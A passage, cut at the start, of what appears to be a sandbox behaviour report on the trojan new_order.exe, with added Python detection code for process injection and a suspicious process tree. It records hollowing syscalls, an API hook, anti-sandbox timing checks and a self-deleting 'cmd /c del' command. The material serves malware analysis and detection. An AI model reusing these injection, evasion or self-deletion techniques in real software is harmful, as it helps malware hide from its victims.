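    (1, "NtWriteVirtualMemory", 3),
    (1, "NtWriteVirtualMemory", 3),
    (1, "NtSetContextThread", 3),
    (1, "NtResumeThread", 3),
    (3, "NtAllocateVirtualMemory", 3),   # self-directed: ignored
    (3, "NtCreateSection", 3),
    (3, "NtMapViewOfSection", 3),
    (3, "NtOpenProcess", 5),
    (3, "NtMapViewOfSection", 5),        # same section mapped into explorer
    (3, "NtOpenThread", 5),
    (3, "NtQueueApcThread", 5),
    (3, "NtResumeThread", 5),
]

if __name__ == "__main__":
    for technique, src, dst in detect_injection(TRACE):
        print(f"{technique}: PID {src} -> PID {dst}")
```

The matcher deliberately accepts NtMapViewOfSection in place of NtWriteVirtualMemory, because a section created locally and mapped into the target (NtCreateSection followed by NtMapViewOfSection, both present in the inventory above) puts code into the target without a single write call.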
Source: new_order.exe, 00000001.00000003.688386050.000000001AF9F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs new_order.exe
Source: new_order.exe, 00000001.00000003.685072751.000000001AE06000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs new_order.exe
Source: new_order.exe, 00000003.00000002.756160019.0000000000CDF000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs new_order.exe
Source: new_order.exe, 00000003.00000002.757240625.00000000029AE000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs new_order.exe
Source: new_order.exe, 00000003.00000002.755889616.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs new_order.exe
Source: new_order.exe, 00000003.00000003.690131310.0000000000806000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs new_order.exe
Source: C:\Users\user\Desktop\new_order.exe | File read: C:\Users\user\Desktop\new_order.exe
Source: new_order.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\new_order.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\new_order.exe "C:\Users\user\Desktop\new_order.exe"
Source: C:\Users\user\Desktop\new_order.exe | Process created: C:\Users\user\Desktop\new_order.exe "C:\Users\user\Desktop\new_order.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new_order.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
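The process-creation rows above are the part of this report that transfers directly to endpoint telemetry, and they carry three separately detectable behaviours: the sample re-launching its own image (the hollowing target), the 64-bit shell C:\Windows\explorer.exe spawning the 32-bit C:\Windows\SysWOW64\explorer.exe with a bare command line, and that SysWOW64 explorer.exe running cmd.exe /c del against the original sample path (the "Self deletion via cmd delete" signature). Note that the conhost.exe child is noise generated by cmd.exe itself. The added example below (written for this page, not Joe Sandbox code) reconstructs those three checks over a constructed Sysmon event-1 style feed built from the rows above; paths are the report's, the event shape and the ProcEvent type are assumptions, and the third check is deliberately tied to an image that already executed in the chain rather than to the literal filename, so it generalises to other droppers.

```python
"""Process-tree triage for the chain in the rows above.

Added example, not Joe Sandbox code. EVENTS is constructed from the
report's 'Process created' rows in the shape of a Sysmon event-1 style
feed (parent image, child image, child command line); the paths are the
report's, the feed itself is not.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image path ("" when unknown)
    image: str    # child image path
    cmdline: str  # child command line


EVENTS = [
    ProcEvent("", r"C:\Users\user\Desktop\new_order.exe",
              r'"C:\Users\user\Desktop\new_order.exe"'),
    ProcEvent(r"C:\Users\user\Desktop\new_order.exe", r"C:\Users\user\Desktop\new_order.exe",
              r'"C:\Users\user\Desktop\new_order.exe"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe",
              r"C:\Windows\SysWOW64\explorer.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'/c del "C:\Users\user\Desktop\new_order.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# cmd.exe "del" with an optionally quoted path as the last argument
DEL_RE = re.compile(r'\bdel\b\s+"?(?P<path>[^"]+?)"?\s*$', re.IGNORECASE)


def triage(events):
    """Return (finding, subject) pairs for the three behaviours in the chain."""
    findings = []
    executed = {e.image.lower() for e in events}   # every image that ran
    for e in events:
        img, parent = e.image.lower(), e.parent.lower()
        base, pbase = ntpath.basename(img), ntpath.basename(parent)

        # 1. An image re-launching itself is the usual prelude to hollowing
        #    a suspended copy of the same executable.
        if parent and img == parent:
            findings.append(("self_relaunch", e.image))

        # 2. The 64-bit shell spawning the 32-bit explorer.exe from SysWOW64
        #    with a bare command line: not something the shell does on its own.
        if (pbase == "explorer.exe" and base == "explorer.exe"
                and "\\syswow64\\" in img and "\\syswow64\\" not in parent):
            findings.append(("wow64_explorer_from_shell", e.image))

        # 3. cmd.exe /c del <path> where <path> is an image that executed
        #    earlier in the chain: the payload erasing its own dropper.
        if base == "cmd.exe":
            m = DEL_RE.search(e.cmdline)
            if m and m.group("path").lower() in executed:
                findings.append(("self_delete_via_cmd", m.group("path")))
    return findings


if __name__ == "__main__":
    for name, subject in triage(EVENTS):
        print(f"{name}: {subject}")
```

On a real feed the `executed` set would be built per host from a sliding window of earlier process-creation events rather than from the same batch, and check 2 should be keyed on the parent being the user's shell instance (the report's C:\Windows\explorer.exe) so that legitimate 32-bit tooling launched by other 64-bit parents does not trip it.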
Source: C:\Users\user\Desktop\new_order.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\new_order.exe | File created: C:\Users\user\AppData\Local\Temp\nsv94CB.tmp
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/4@3/2
Source: C:\Users\user\Desktop\new_order.exe | Code function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,
Source: C:\Users\user\Desktop\new_order.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\new_order.exe | Code function: 1_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Binary string: explorer.pdbUGP | source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: new_order.exe, 00000001.00000003.684420646.000000001AE80000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000001.00000003.688778251.000000001ACF0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000003.689848535.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755436113.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755889616.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947351653.00000000049FF000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947213320.00000000048E0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: new_order.exe, new_order.exe, 00000003.00000003.689848535.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755436113.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755889616.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000009.00000002.947351653.00000000049FF000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947213320.00000000048E0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: explorer.pdb | source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041E9E6 push 23797168h; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0040E341 push ebp; retf
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00409BCD push ebx; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00419C33 push cs; retf
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041D4F2 push eax; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041D4FB push eax; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041D4A5 push eax; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041D55C push eax; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_004085C2 push edi; retn 6E42h
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00419FF2 push edi; iretd
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AAD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0495D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041E9E6 push 23797168h; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0040E341 push ebp; retf
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00409BCD push ebx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00419C33 push cs; retf
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041D4F2 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041D4FB push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041D4A5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041D55C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00419FF2 push edi; iretd
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\new_order.exeFile created: C:\Users\user\AppData\Local\Temp\nsq94FC.tmp\yvucmw.dll

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE0
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: /c del "C:\Users\user\Desktop\new_order.exe"
          Source: C:\Users\user\Desktop\new_order.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\new_order.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Users\user\Desktop\new_order.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\new_order.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6268Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 6452Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\new_order.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\new_order.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000005.00000000.736579180.000000000A83C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: explorer.exe, 00000005.00000000.721102836.000000000A897000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.736036240.000000000A60E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.736087162.000000000A64D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: explorer.exe, 00000005.00000000.717209975.0000000006650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.736203145.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000005.00000000.729403945.0000000004710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.736203145.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.736087162.000000000A64D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 63}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
          Source: explorer.exe, 00000005.00000000.712962189.0000000004791000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
          Source: explorer.exe, 00000005.00000000.701800617.000000000A784000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\new_order.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_02180402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_02180616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_02180706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_02180744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_021806C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A59080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AEB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00B12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00B21074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A7C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A82990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AE41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A74120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A5C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A82AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04983884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04920050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0498A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04924120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04927D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04943D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04983540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490C962 mov eax, dword ptr fs:[00000030h]
